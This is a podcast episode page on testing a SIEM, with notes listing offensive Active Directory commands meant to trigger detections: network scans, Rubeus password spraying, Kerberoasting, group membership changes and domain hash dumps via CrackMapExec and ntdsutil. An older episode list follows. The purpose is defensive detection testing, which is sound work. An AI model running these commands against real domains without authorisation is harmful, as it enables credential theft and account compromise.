7MS #554: Simple Ways to Test Your SIEM
7 Minute Security6 Jan 2023

7MS #554: Simple Ways to Test Your SIEM

Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:

Port scanning
nmap 10.0.7.0/24 - basic nmap scan
massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports!

Password spraying
Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt

Kerberoasting and ASREPRoasting
rubeus.exe kerberoast /simple
rubeus asreproast /nowrap

Key group membership changes
net group "GROUP NAME" user-to-add-to-a-group /add

Dump Active Directory hashes
cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled
ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q

SMB share hunting
Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares

Avsnitt(689)

7MS #88: Glasswire

7MS #88: Glasswire

This episode's about a cool security app called GlassWire, which is (kind of) a firewall on steroids. I love it! Oh, and this is not an endorsement or a commercial :-)

25 Aug 20156min

7MS #87: Presenting the Right Findings to the Right Audience

7MS #87: Presenting the Right Findings to the Right Audience

Today I talk about challenge I run into when I'm delivering to a mixed audience of C-level folks and IT people. How do you keep things high level enough so everybody "gets it" but also go level enough that the recommendations have some teeth?

20 Aug 20157min

7MS #86: OSWP-The Final Chapter!

7MS #86: OSWP-The Final Chapter!

This episode concludes the gripping, thrilling, exciting, awesome-ing, death-defying, unsettling, rattling series on OSWP (Offensive Security Wireless Professional). Specifically, I talk (as much as I can without getting into trouble) about the exam and give you some pointers to pass it!

18 Aug 20157min

7MS #85: What is The Penetration Testers Framework (PTF)?

7MS #85: What is The Penetration Testers Framework (PTF)?

Need an easy way to create a modular/mobile kit of pentest tools to take with you from machine to machine? And ALSO be able to update all those modules in one command? Then check out the PTF! That's what we're talkin' about on today's podcast.

14 Aug 20157min

7MS #84: DIY Pwn Pad

7MS #84: DIY Pwn Pad

Hey have you heard of Pwn Pads? They're an awesome network pentesting tool that leverages a Nexus tablet - which you can either buy right from Pwnie Express, or create your own if you have a certain model of Nexus lying around. I just happened to have the right Nexus model around, so this podcast episode chronicles my trial and error (mostly error) in making a DIY Pwn Pad! P.S. to get the Android tools installed on Ubuntu 14.04, run these commands: -- sudo add-apt-repository ppa:nilarimogard/webupd8 sudo apt-get update sudo apt-get install android-tools-adb android-tools-fastboot --

12 Aug 20157min

7MS #83: Wifi Pineapple First Impressions

7MS #83: Wifi Pineapple First Impressions

in this episode I talk about my first hands-on experience with a Wifi Pineapple, and why you'll probably want one too.

6 Aug 20158min

7MS #82: OSWP-Part 3

7MS #82: OSWP-Part 3

The OSWP series is coming to a close. One final episode today and then the four-quel episode will be all about the test!

4 Aug 20157min

7MS #81: OSWP-Part 2

7MS #81: OSWP-Part 2

A continuation of our thrilling, exciting, mind-blowing series on OSWP (Offensive Security Wireless Professional)!

30 Juli 20158min

Populärt inom Politik & nyheter

svenska-fall
p3-krim
rss-viva-fotboll
flashback-forever
rss-sanning-konsekvens
svd-dokumentara-berattelser-2
aftonbladet-daily
rss-vad-fan-hande
olyckan-inifran
rss-krimstad
fordomspodden
dagens-eko
motiv
rss-frandfors-horna
krimmagasinet
rss-krimreportrarna
blenda-2
svd-nyhetsartiklar
kungligt
svd-ledarredaktionen